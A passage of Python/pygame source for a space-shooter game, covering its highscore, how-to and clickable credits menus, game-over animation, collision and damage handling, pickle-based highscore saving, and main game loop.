True\r\n while highscore_menu:\r\n\r\n window.blit(background_img, (0,0))\r\n window.blit(background_over, (0,0))\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n '''\r\n \r\n textRect_head1.center = ((window_width*1.5/6),(window_height/8)+20)\r\n textRect_head2.center = ((window_width*4/6),(window_height/8)+20)\r\n window.blit(textSurface_head1, textRect_head1)\r\n window.blit(textSurface_head2, textRect_head2)\r\n\r\n linespace = 70\r\n if hs_dict:\r\n for key, val in hs_dict.items():\r\n textSurface_val1 = textFont_val.render(str(val[0]), True, (0,0,0))\r\n textRect_val1 = textSurface_val1.get_rect()\r\n textRect_val1.center = ((window_width*1.5/6),(window_height/8)+30+linespace)\r\n window.blit(textSurface_val1, textRect_val1)\r\n\r\n 
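# second column: val[1] is the 'Date, Time' string stored when the score was recorded\r\n                    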
textSurface_val2 = textFont_val.render(val[1], True, (0,0,0))\r\n textRect_val2 = textSurface_val2.get_rect()\r\n textRect_val2.center = ((window_width*4/6),(window_height/8)+30+linespace)\r\n window.blit(textSurface_val2, textRect_val2)\r\n\r\n linespace += 70\r\n\r\n back_btn.draw_button(back_command, event_list)\r\n\r\n pg.display.update()\r\n\r\nhow_to_menu = False \r\ndef game_how_to():\r\n global background_img, background_over\r\n global window_width, window_height, how_to_menu\r\n\r\n #background_over = pg.image.load(r'.\\resources\\images\\text-background\\game-intro.png').convert_alpha()\r\n \r\n back_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\back40.png').convert_alpha()\r\n back_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\back56.png').convert_alpha()\r\n back_btn_inactive_x = 15\r\n back_btn_inactive_y = 20\r\n\r\n back_btn = OnlyImgButton(back_btn_inactive_img, back_btn_active_img,\r\n back_btn_inactive_x, back_btn_inactive_y)\r\n\r\n linespace = 30\r\n paraspace = 40\r\n \r\n textFont_head = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 50)\r\n head_text = ['Player Movement', 'Player Weapons', 'Powerups']\r\n head_surface = []\r\n for txt in head_text:\r\n head_surface.append([textFont_head.render(txt, True, (0,0,0)),\r\n textFont_head.render(txt, True, (0,0,0)).get_rect()])\r\n head_surface[0][1].midtop = (window_width/2, 40)\r\n \r\n textFont_para = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 40)\r\n para_text = ['Use keyboard arrow keys ', ' to move player', 'spaceship.',\r\n 'Use keyboard key ', ' to shoot lasers at enemy.' ,\r\n 'Use keyboard key ', ' to shoot missile at enemy when fully', 'charged.',\r\n 'Collect Powerups for different effects.',\r\n ' - Gain 1 life.', ' - Freeze enemy for 3 seconds.', ' - Charge up the missile launcher.']\r\n para_surface = []\r\n for txt in para_text:\r\n para_surface.append([textFont_para.render(txt, True, (0,0,0)),\r\n textFont_para.render(txt, True, (0,0,0)).get_rect()])\r\n \r\n para_surface[0][1].topleft = (50, head_surface[0][1].bottom+linespace)\r\n\r\n images = [\r\n [pg.image.load(r'.\\resources\\images\\how-to\\left72.png'),\r\n pg.Rect(para_surface[0][1].right, para_surface[0][1].top, 72, 72)],\r\n [pg.image.load(r'.\\resources\\images\\how-to\\up72.png'),\r\n pg.Rect(para_surface[0][1].right+90, para_surface[0][1].top, 72, 72)],\r\n [pg.image.load(r'.\\resources\\images\\how-to\\down72.png'),\r\n pg.Rect(para_surface[0][1].right+90+90, para_surface[0][1].top, 72, 72)],\r\n [pg.image.load(r'.\\resources\\images\\how-to\\right72.png'),\r\n pg.Rect(para_surface[0][1].right+90+90+90, para_surface[0][1].top, 72, 72)]\r\n ]\r\n\r\n para_surface[1][1].topleft = (images[3][1].right, head_surface[0][1].bottom+linespace)\r\n para_surface[2][1].topleft = (50, para_surface[1][1].bottom+linespace)\r\n head_surface[1][1].midtop = (window_width/2, para_surface[2][1].bottom+paraspace)\r\n para_surface[3][1].topleft = (50, head_surface[1][1].bottom+linespace)\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\a72.png'),\r\n pg.Rect(para_surface[3][1].right, para_surface[3][1].top, 72, 72)])\r\n para_surface[4][1].topleft = (images[4][1].right, para_surface[3][1].top)\r\n para_surface[5][1].topleft = (50, para_surface[4][1].bottom+linespace)\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\s72.png'),\r\n pg.Rect(para_surface[5][1].right, para_surface[5][1].top, 72, 72)])\r\n para_surface[6][1].topleft = 
(images[5][1].right, para_surface[5][1].top)\r\n para_surface[7][1].topleft = (50, para_surface[6][1].bottom+linespace)\r\n head_surface[2][1].midtop = (window_width/2, para_surface[7][1].bottom+paraspace)\r\n para_surface[8][1].topleft = (50, head_surface[2][1].bottom+linespace)\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\life72.png'),\r\n pg.Rect(50, para_surface[8][1].bottom+linespace, 72, 72)])\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\freeze72.png'),\r\n pg.Rect(50, images[6][1].bottom+linespace, 72, 72)])\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\charge72.png'),\r\n pg.Rect(50, images[7][1].bottom+linespace, 72, 72)])\r\n para_surface[9][1].topleft = (images[6][1].right, images[6][1].top)\r\n para_surface[10][1].topleft = (images[7][1].right, images[7][1].top)\r\n para_surface[11][1].topleft = (images[8][1].right, images[8][1].top)\r\n\r\n endy = para_surface[-1][1].bottom\r\n window_scroll = 20\r\n scrollbar_height = window_height/(endy/window_height)\r\n scrollbar_rect = pg.Rect(window_width-30, 40, 20, scrollbar_height)\r\n scrollbar_scroll = (window_height-scrollbar_rect.bottom-20)*(window_scroll)/(endy+50-window_height)\r\n \r\n how_to_menu = True\r\n while how_to_menu:\r\n\r\n window.blit(background_img, (0,0))\r\n window.blit(background_over, (0,0))\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n \r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n '''\r\n \r\n if event.type == pg.MOUSEWHEEL:\r\n if event.y < 0:\r\n if para_surface[-1][1].bottom > window_height-50:\r\n for surface, rect in head_surface:\r\n rect.y += event.y*window_scroll\r\n for surface, rect in para_surface:\r\n rect.y += event.y*window_scroll\r\n for surface, rect in images:\r\n rect.y += event.y*window_scroll\r\n scrollbar_rect.y -= event.y*scrollbar_scroll\r\n if scrollbar_rect.bottom > window_height-20:\r\n scrollbar_rect.bottom = window_height-20\r\n elif event.y > 0:\r\n if head_surface[0][1].top < 40:\r\n for surface, rect in head_surface:\r\n rect.y += event.y*window_scroll\r\n for surface, rect in para_surface:\r\n rect.y += event.y*window_scroll\r\n for surface, rect in images:\r\n rect.y += event.y*window_scroll\r\n scrollbar_rect.y -= math.floor(event.y*scrollbar_scroll)\r\n if scrollbar_rect.bottom < scrollbar_height+40:\r\n scrollbar_rect.bottom = scrollbar_height+40\r\n\r\n for surface, rect in head_surface:\r\n rect.centerx = window_width/2\r\n window.blit(surface, rect)\r\n \r\n for surface, rect in para_surface: \r\n window.blit(surface, rect)\r\n\r\n for img, rect in images: \r\n window.blit(img, rect)\r\n\r\n back_btn.draw_button(back_command, event_list)\r\n\r\n scrollbar_rect.h = window_height/(endy/window_height)\r\n scrollbar_rect.left = window_width-30\r\n\r\n pg.draw.rect(window, (0,0,0), scrollbar_rect)\r\n \r\n pg.display.update()\r\n\r\ncredit_menu = False \r\ndef game_credits():\r\n global background_img, background_over\r\n global window_width, window_height, credit_menu\r\n\r\n #background_over = pg.image.load(r'.\\resources\\images\\text-background\\game-intro.png').convert_alpha()\r\n \r\n 
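# credit entries behave like hyperlinks: hovering swaps in the underlined freetype font and a hand cursor, and a left-click opens the URL in the browser via webbrowser.open_new_tab()\r\n    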
back_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\back40.png').convert_alpha()\r\n back_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\back56.png').convert_alpha()\r\n back_btn_inactive_x = 15\r\n back_btn_inactive_y = 20\r\n\r\n back_btn = OnlyImgButton(back_btn_inactive_img, back_btn_active_img,\r\n back_btn_inactive_x, back_btn_inactive_y)\r\n\r\n '''\r\n textFont_head = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 50)\r\n textSurface_head1 = textFont_head.render('Score', True, (0,0,0))\r\n textSurface_head2 = textFont_head.render('Date, Time', True, (0,0,0))\r\n textRect_head1 = textSurface_head1.get_rect()\r\n textRect_head2 = textSurface_head2.get_rect()\r\n '''\r\n \r\n textFont_entry = freetype.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 20)\r\n textFont_entry_underline = freetype.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 20)\r\n textFont_entry_underline.underline = True\r\n\r\n linespace = 12\r\n headspace = 20\r\n\r\n credit_img = [\r\n {'link' : \"https://www.flaticon.com/authors/icongeek26\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/freepik\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/bqlqn\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/darius-dan\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/fjstudio\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/smashicons\", 'rect' : None, 'underline' : False},\r\n {'link' : \"http://fontawesome.io/\", 'rect' : None, 'underline' : False},\r\n {'link' : \"http://www.creaticca.com/\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://creativemarket.com/eucalyp\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/kirill-kazachek\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/itim2101\", 'rect' : None, 'underline' : False}\r\n ]\r\n\r\n credit_sound = [\r\n {'link' : 'https://freesound.org/people/LittleRobotSoundFactory/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/BigKahuna360/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Jace/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/qubodup/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Bird_man/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/asdftekno/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/JustInvoke/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Mozfoo/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Robinhood76/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/alexmol/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Capashen/', 'rect' : None, 'underline' : False}\r\n ]\r\n\r\n start_pos = [100, 0]\r\n\r\n window_scroll = 20\r\n \r\n credit_menu = True\r\n while credit_menu:\r\n\r\n window.blit(background_img, (0,0))\r\n window.blit(background_over, (0,0))\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n 
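# the commented-out block below is the older inline resize handling, kept for reference (now done by resize())\r\n            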
'''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n '''\r\n \r\n prevrect_img = pg.Rect(*start_pos, 50, 50)\r\n for credit in credit_img:\r\n if credit['underline']:\r\n surface, rect = textFont_entry_underline.render(credit['link'], (0,0,0))\r\n else:\r\n surface, rect = textFont_entry.render(credit['link'], (0,0,0))\r\n rect.topleft = (prevrect_img.left, prevrect_img.bottom+linespace)\r\n credit['rect'] = rect\r\n prevrect_img = rect\r\n window.blit(surface, rect)\r\n\r\n prevrect_sound = pg.Rect(start_pos[0], prevrect_img.bottom, 50, 50)\r\n for credit in credit_sound:\r\n if credit['underline']:\r\n surface, rect = textFont_entry_underline.render(credit['link'], (0,0,0))\r\n else:\r\n surface, rect = textFont_entry.render(credit['link'], (0,0,0))\r\n rect.topleft = (prevrect_sound.left, prevrect_sound.bottom+linespace)\r\n credit['rect'] = rect\r\n prevrect_sound = rect\r\n window.blit(surface, rect)\r\n\r\n for event in event_list:\r\n if event.type == pg.MOUSEWHEEL:\r\n if event.y < 0:\r\n if prevrect_sound.bottom > window_height-50:\r\n start_pos[1] += event.y*window_scroll\r\n if event.y > 0:\r\n if start_pos[1] < 0:\r\n start_pos[1] += event.y*window_scroll\r\n\r\n if event.type == pg.MOUSEMOTION:\r\n for credit in credit_img+credit_sound:\r\n if credit['rect'].collidepoint(event.pos):\r\n credit['underline'] = True\r\n pg.mouse.set_system_cursor(pg.SYSTEM_CURSOR_HAND)\r\n else:\r\n credit['underline'] = False\r\n #pg.mouse.set_system_cursor(pg.SYSTEM_CURSOR_ARROW)\r\n \r\n if event.type == pg.MOUSEBUTTONUP:\r\n for credit in credit_img+credit_sound:\r\n if credit['rect'].collidepoint(event.pos) and event.button == 1:\r\n webbrowser.open_new_tab(credit['link'])\r\n\r\n if not any([x['underline'] for x in credit_img+credit_sound]):\r\n pg.mouse.set_system_cursor(pg.SYSTEM_CURSOR_ARROW)\r\n\r\n '''\r\n mouse_pos = pg.mouse.get_pos()\r\n mouse_click = pg.mouse.get_pressed()\r\n for credit in credit_img+credit_sound:\r\n if credit['rect'].collidepoint(mouse_pos):\r\n credit['underline'] = True\r\n if mouse_click[0]:\r\n print(mouse_click) \r\n else:\r\n credit['underline'] = False\r\n '''\r\n \r\n back_btn.draw_button(back_command, event_list)\r\n \r\n pg.display.update()\r\n\r\ndef game_over(dt, screenshot):\r\n global window_width, window_height, pause_txt_background, intro\r\n\r\n textBackground = pg.image.load(r'F:\\PYTHON\\battleship_game\\resources\\images\\text-background\\home-background1920.png').convert_alpha()\r\n textBackgroundRect = textBackground.get_rect()\r\n textBackgroundRect.center = ((window_width/2), (window_height/2))\r\n\r\n textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Bold.ttf', 100)\r\n textSurface = textFont.render('Game Over', True, (0,0,0))\r\n textRect = textSurface.get_rect()\r\n textRect.midleft = (window_width, (textBackgroundRect.top + textBackgroundRect.height*2/3))\r\n\r\n textFont2 = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 80)\r\n textSurface2 = textFont2.render('Score : ' + str(score_value), True, (0,0,0))\r\n textRect2 = textSurface2.get_rect()\r\n textRect2.midbottom = (window_width/2, (textBackgroundRect.top + textBackgroundRect.height*1/3))\r\n\r\n while True:\r\n\r\n event_list = pg.event.get()\r\n for event in 
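Hover, click, and cursor handling for the credit links boils down to three event branches. A condensed sketch of that logic, assuming the same list-of-dicts shape as credit_img/credit_sound:

import webbrowser
import pygame

def handle_link_events(events, links):
    # `links` entries look like the credit dicts above:
    # {'link': url, 'rect': pygame.Rect, 'underline': bool}
    for event in events:
        if event.type == pygame.MOUSEMOTION:
            for entry in links:
                entry['underline'] = bool(entry['rect'].collidepoint(event.pos))
        elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:
            for entry in links:
                if entry['rect'].collidepoint(event.pos):
                    webbrowser.open_new_tab(entry['link'])
    # Hand cursor while any link is hovered, arrow otherwise -- the same
    # any(...) check that closes the hover handling above.
    hovered = any(entry['underline'] for entry in links)
    pygame.mouse.set_system_cursor(
        pygame.SYSTEM_CURSOR_HAND if hovered else pygame.SYSTEM_CURSOR_ARROW)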
event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n '''\r\n \r\n window.blit(pg.transform.scale(screenshot, (window_width, window_height)), (0,0))\r\n window.blit(textBackground, textBackgroundRect)\r\n window.blit(textSurface, textRect)\r\n textRect2.centerx = window_width/2\r\n window.blit(textSurface2, textRect2)\r\n\r\n change = 0.2*dt\r\n if textRect.left - change < 0:\r\n multiplier = 10 ** 0\r\n change = math.ceil(change * multiplier) / multiplier\r\n\r\n textRect.left -= change\r\n\r\n if textRect.right <= -10:\r\n intro = True\r\n reset()\r\n break\r\n\r\n pg.display.update()\r\n \r\n\r\n#Function to decrease life of player on collision with enemy or enemy lasers\r\nplayer_dmg_sound = mixer.Sound(r'.\\resources\\sounds\\whoosh-sci-fi-short.wav')\r\ndef player_collision(dt):\r\n global enemy_small, enemy_medium, player_rect, player_health, mute, score_value\r\n global enemy_large, player_dmg_sound, mute, powerups, channels\r\n\r\n for enemy in enemy_small:\r\n if (player_rect.colliderect(enemy_small[enemy]['rect']) and\r\n enemy_small[enemy]['alive']):\r\n player_health -= 1\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n\r\n if (player_rect.colliderect(enemy_small[enemy]['laser_rect']) and\r\n enemy_small[enemy]['laser_draw']):\r\n player_health -= 1\r\n enemy_small[enemy]['laser_draw'] = False\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n\r\n for laser in enemy_medium.lasers:\r\n if player_rect.colliderect(enemy_medium.lasers[laser]['laser1rect']):\r\n enemy_medium.lasers[laser]['cur_laser1_x'] = enemy_medium.lasers[laser]['cur_laser1_y'] = -50\r\n player_health -= 1\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n if player_rect.colliderect(enemy_medium.lasers[laser]['laser2rect']):\r\n enemy_medium.lasers[laser]['cur_laser2_x'] = enemy_medium.lasers[laser]['cur_laser2_y'] = -50\r\n player_health -= 1\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n\r\n for laser in enemy_large.lasers:\r\n if player_rect.colliderect(enemy_large.lasers[laser]['laser1rect']):\r\n enemy_large.lasers[laser]['laser1rect'].x = enemy_large.lasers[laser]['laser1rect'].y = -50\r\n player_health -= 1\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n\r\n for plasma in enemy_large.plasmas:\r\n if player_rect.colliderect(enemy_large.plasmas[plasma]['rect']):\r\n enemy_large.plasmas[plasma]['cur_x'] = enemy_large.plasmas[plasma]['cur_y'] = -50\r\n player_health -= 1\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n\r\n for item in powerups.powerups:\r\n if player_rect.colliderect(powerups.powerups[item]['rect']):\r\n powerups.powerups[item]['func'](dt)\r\n\r\n \r\ndef update_highscore():\r\n global hs_dict, score_value\r\n\r\n if len(hs_dict) < 5:\r\n hs_dict[len(hs_dict)+1] = [score_value, datetime.datetime.now().strftime('%d-%b-%Y, %I:%M:%S %p')]\r\n elif len(hs_dict) == 5:\r\n if score_value >= hs_dict[list(hs_dict.keys())[-1]][0]:\r\n hs_dict[list(hs_dict.keys())[-1]] = [score_value, datetime.datetime.now().strftime('%d-%b-%Y, %I:%M:%S %p')]\r\n\r\n 
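Every branch of player_collision() is the same pattern: one rect test per projectile, park the projectile off-screen on hit, apply one point of damage. The pattern in isolation, with illustrative names:

import pygame

def apply_hits(player_rect, projectiles):
    # Generic form of the per-laser checks above: one colliderect() test per
    # projectile; a hit parks the projectile off-screen so it can be reused.
    damage = 0
    for proj in projectiles:
        if player_rect.colliderect(proj['rect']):
            proj['rect'].topleft = (-50, -50)
            damage += 1
    return damage

player = pygame.Rect(100, 100, 64, 64)
lasers = [{'rect': pygame.Rect(110, 110, 4, 16)},
          {'rect': pygame.Rect(0, 0, 4, 16)}]
print(apply_hits(player, lasers))   # 1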
hs_dict = {k: v for k, v in sorted(hs_dict.items(), key=lambda item: item[1][0], reverse=True)}\r\n\r\n with open('highscores.pickle', 'wb') as fh:\r\n pickle.dump(hs_dict, fh)\r\n\r\n#Resize and rearrange various surfaces\r\ndef resize(event):\r\n global window_width, window_height, window_rect, pause_btn, play_btn, charge_rect\r\n global rocket_rect, unmute_btn, mute_btn ,home_btn, play_text_btn, highscore_text_btn\r\n global quit_text_btn, credit_text_btn, how_text_btn, enemy_medium, enemy_large\r\n\r\n\r\n player_update(event)\r\n\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n update_player_health_rect()\r\n\r\n pause_btn.update_param()\r\n play_btn.update_param()\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n home_btn.update_param()\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n charge_rect.bottomleft = (10, window_height-10)\r\n rocket_rect.center = charge_rect.center\r\n\r\n enemy_medium.resize()\r\n enemy_large.resize()\r\n \r\n \r\n#Reset game and make it ready for new game\r\ndef reset():\r\n global score_value, cur_player_x, cur_player_y, player_img_w, player_img_h\r\n global lasers, reset_game, enemy_medium, isinit_enemy_small_last\r\n global spawn_medium_enemy_trigger1, spawn_medium_enemy_trigger2\r\n global player_health, playerX_change, playerY_change, lvl_value, player_max_health\r\n global enemy_large, charge_value, missile_explosion_dict, powerups, enemy_small_killed\r\n \r\n if score_value > 0:\r\n update_highscore()\r\n score_value = 0\r\n\r\n lvl_value = 1\r\n\r\n charge_value = 0\r\n\r\n player_health = player_max_health\r\n\r\n cur_player_x = window_width/2 - player_img_w/2\r\n cur_player_y = ((window_height/player_img_h)-1.5)*player_img_h\r\n playerX_change = 0\r\n playerY_change = 0\r\n\r\n init_enemy_small_pos()\r\n isinit_enemy_small_last = False\r\n enemy_small_killed = 0\r\n \r\n lasers.clear()\r\n\r\n enemy_medium.__init__()\r\n spawn_medium_enemy_trigger1 = False\r\n spawn_medium_enemy_trigger2 = False\r\n\r\n enemy_large.__init__()\r\n spawn_large_enemy_trigger1 = False\r\n spawn_large_enemy_trigger2 = False\r\n\r\n for explosion in missile_explosion_dict:\r\n missile_explosion_dict[explosion][1].center = (-1000, -1000)\r\n\r\n powerups.__init__()\r\n\r\n reset_game = False\r\n\r\n#Mainloop clock\r\nclock = pg.time.Clock()\r\n\r\nfps_font = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 20) \r\nreset_game = False\r\nrunning = True\r\n\r\n\r\n#MAIN GAME LOOP\r\n#All gameplay objects are drawn in this loop.\r\n#All evnets(like mouse click and key press) during gameplay are handled in this loop. 
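update_highscore() keeps at most five [score, timestamp] pairs, replacing the current minimum and re-sorting. A compact equivalent that merges, sorts, trims, and renumbers the slots in one pass; the /tmp path is illustrative:

import datetime
import pickle

def record_score(hs_dict, score, path='/tmp/highscores.pickle', keep=5):
    # Merge the new score in, sort by score descending, keep the top five,
    # renumber the slots 1..keep, persist -- same net effect as above.
    stamp = datetime.datetime.now().strftime('%d-%b-%Y, %I:%M:%S %p')
    entries = sorted(list(hs_dict.values()) + [[score, stamp]],
                     key=lambda item: item[0], reverse=True)[:keep]
    hs_dict = {i + 1: v for i, v in enumerate(entries)}
    with open(path, 'wb') as fh:
        pickle.dump(hs_dict, fh)
    return hs_dict

print(record_score({1: [40, 'earlier'], 2: [10, 'earlier']}, 25))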
\r\nwhile running:\r\n \r\n dt = clock.tick(60)\r\n if dt > 30:\r\n dt = 30\r\n \r\n fps_surface = fps_font.render(f'{clock.get_fps():.2f}', True, (0,0,0))\r\n window.fill((255,255,255))\r\n\r\n if intro:\r\n game_intro()\r\n if reset_game:\r\n reset()\r\n\r\n background.draw_background(dt)\r\n\r\n #EVENT HANDLING\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n\r\n if event.type == pg.QUIT:\r\n if score_value:\r\n update_highscore()\r\n running = False\r\n #pg.quit()\r\n #sys.exit()\r\n\r\n if event.type == pg.KEYDOWN:\r\n if event.key == pg.K_LEFT:\r\n playerX_change = -player_xspeed*dt\r\n if event.key == pg.K_RIGHT:\r\n playerX_change = player_xspeed*dt\r\n if event.key == pg.K_UP:\r\n playerY_change = -player_yspeed*dt\r\n if event.key == pg.K_DOWN:\r\n playerY_change = player_yspeed*dt\r\n\r\n if event.key == pg.K_a:\r\n add_laser()\r\n if event.key == pg.K_s:\r\n if charge_value == 12:\r\n if mute == False:\r\n channels[4].play(missile_launch_sound)\r\n missile_draw = True\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_cur_x = missile_rect.x\r\n missile_cur_y = missile_rect.y\r\n charge_value = 0\r\n \r\n if event.type == pg.KEYUP:\r\n if event.key == pg.K_LEFT or event.key == pg.K_RIGHT:\r\n pressed = pg.key.get_pressed()\r\n if pressed[pg.K_RIGHT] or pressed[pg.K_LEFT]:\r\n playerX_change = playerX_change\r\n else:\r\n playerX_change = 0\r\n if event.key == pg.K_UP or event.key == pg.K_DOWN:\r\n pressed = pg.key.get_pressed()\r\n if pressed[pg.K_UP] or pressed[pg.K_DOWN]:\r\n playerY_change = playerY_change\r\n else:\r\n playerY_change = 0\r\n\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n player_update(event)\r\n\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n update_player_health_rect()\r\n\r\n pause_btn.update_param()\r\n play_btn.update_param()\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n home_btn.update_param()\r\n\r\n charge_rect.bottomleft = (10, window_height-10)\r\n rocket_rect.center = charge_rect.center\r\n '''\r\n\r\n powerups.draw(dt)\r\n\r\n draw_charge_quantity()\r\n \r\n #Drawing flashes from payer cannon\r\n pressed = pg.key.get_pressed()\r\n if pressed[pg.K_a]:\r\n num = draw_flash(player_rect, num)\r\n \r\n background_objects.draw_objects(dt)\r\n \r\n draw_player()\r\n\r\n #if str(lvl_value)[-1] == '9' and score_value%20 == 0:\r\n # increase_lvl()\r\n \r\n #Condition to spawn large enemy\r\n #if lvl_value and lvl_value%5 == 0:\r\n if (lvl_value and\r\n enemy_small_killed >= 20 and\r\n (str(lvl_value)[-1] == '4' or\r\n str(lvl_value)[-1] == '9')):\r\n if not isinit_enemy_small_last:\r\n isinit_enemy_small_last = True\r\n spawn_large_enemy_trigger1 = True\r\n init_enemy_small_last()\r\n\r\n if spawn_large_enemy_trigger1 and not spawn_large_enemy_trigger2:\r\n draw_enemy_small_last(dt)\r\n\r\n if spawn_large_enemy_trigger1 and spawn_large_enemy_trigger2:\r\n enemy_large.draw_enemy(dt, event_list)\r\n \r\n #Condition to spawn medium enemy\r\n if (enemy_small_killed >= 20 and\r\n str(lvl_value)[-1] != '9' and str(lvl_value)[-1] != '4'):\r\n if not isinit_enemy_small_last:\r\n isinit_enemy_small_last = True\r\n spawn_medium_enemy_trigger1 = True\r\n init_enemy_small_last() \r\n \r\n if spawn_medium_enemy_trigger1 and not spawn_medium_enemy_trigger2:\r\n draw_enemy_small_last(dt)\r\n\r\n if spawn_medium_enemy_trigger1 and spawn_medium_enemy_trigger2:\r\n enemy_medium.draw_enemy(dt, event_list)\r\n\r\n \r\n if not spawn_medium_enemy_trigger1 and not 
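The main loop clamps dt to 30 ms so a stall cannot teleport the player, then scales every velocity by dt for frame-independent motion. The two lines that matter, runnable on their own:

import pygame

pygame.init()
clock = pygame.time.Clock()
x, speed = 0.0, 0.3                # speed in px/ms, like player_xspeed above

for _ in range(3):
    dt = min(clock.tick(60), 30)   # same spike clamp as the main loop
    x += speed * dt                # px/ms * ms -> pixels this frame
print(x)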
spawn_large_enemy_trigger1:\r\n draw_enemy_small(dt)\r\n\r\n draw_laser(dt)\r\n\r\n #if missile_draw:\r\n draw_missile(dt)\r\n\r\n draw_score(scoreX, scoreY)\r\n draw_lvl()\r\n\r\n screenshot = pg.Surface((window_width, window_height))\r\n screenshot.blit(window, (0,0))\r\n \r\n home_btn.update_param()\r\n home_btn.draw_button(home_command, event_list, screenshot)\r\n \r\n pause_btn.update_param()\r\n pause_btn.draw_button(pause_command, event_list, screenshot)\r\n\r\n mute_btn.btn_inactiveX = window_width - mute_btn_inactive_img.get_width() - 15\r\n mute_btn.btn_inactiveY = 20 + mute_btn_inactive_img.get_height() + 20\r\n mute_btn.update_param()\r\n unmute_btn.btn_inactiveX = window_width - unmute_btn_inactive_img.get_width() - 15\r\n unmute_btn.btn_inactiveY = 20 + unmute_btn_inactive_img.get_height() + 20\r\n unmute_btn.update_param()\r\n if mute:\r\n unmute_btn.draw_button(unmute_command, event_list)\r\n else:\r\n mute_btn.draw_button(mute_command, event_list)\r\n\r\n if player_health < 1:\r\n 